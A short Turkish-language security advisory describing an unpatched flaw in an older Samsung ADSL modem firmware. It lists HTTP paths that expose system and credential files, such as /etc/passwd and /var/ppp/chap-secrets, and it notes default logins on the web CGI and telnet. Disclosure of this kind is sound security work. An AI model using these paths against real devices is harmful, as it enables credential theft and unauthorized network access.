Açığın ismi : ADSL Modem Çoklu Çapraz Bağlantı Açığı
Etkilenenler : Samsung ADSL Modem Samsung Electronics (co) cpe chipset
software version SMDK8947v1.2 Jul 11 2003 10:00:01
ADSL DMT version a-110.030620-10130710
Etkiler :
1- isteğe göre izin verme açığı
2- bir görevi yerine getirememe yada parola sıfırlama yada parola hatırlamama.
3- sistem girişi izini verme.
Bilgi ( Detay ) : Samsung adsl modemlerin Windows ve Linux İşletim sistemlerine uyumlu olanlarinda Güvenlik zaafiyatı vardır. Güvenlik zaafiyatindan dolayı kullanıcıların izini olmadan sisteme izinsiz port girişleri olmaktadır. HTTP bağlantılarında, protokollerde sorun yaşanmaktadır. Güvenlik zaafiyatindan kullanıcıların olumsuz etkilenmektedir.
Güvenlik zaafiyatı nasil işlemektedir ? :
http://[someSamsung.ip]/etc/passwd
http://[someSamsung.ip]/etc/hosts
http://[someSamsung.ip]/bin/
http://[someSamsung.ip]/dev/
http://[someSamsung.ip]/lib/
http://[someSamsung.ip]/tmp/
http://[someSamsung.ip]/var/ppp/chap-secrets
http://[someSamsung.ip]/bin/sh
Uzaktan yada dışarıdan kötü niyetli kişiler, hacker'lar sisteme giriş yapabilmektedirler. WAN bağlantısı ile yada LAN yolu ile sisteme giriş yapılabilmektedir.
İkinci Güvenlik zaafiyatı ise :
Default user login / passwords exist in both
httpd ( http://[host]/cgi-bin/adsl.cgi) and telnet ports
Kök tanımlama // admin girişi ve kullanıcı adı/şifre bölümündedir.
Çözüm(Yama): Samsung Firmasından şu ana kadar hiç bir yama gelmemiştir. Güvenlik açığından haberdar olduklarindan bile haberdar olunmamaktadır.
Kaynak: SecurityFocus Güvenlik - Olympos Güvenlik
Güvenlik açığı yazarı : SnoB ->> SnoBmsn@hotmail.de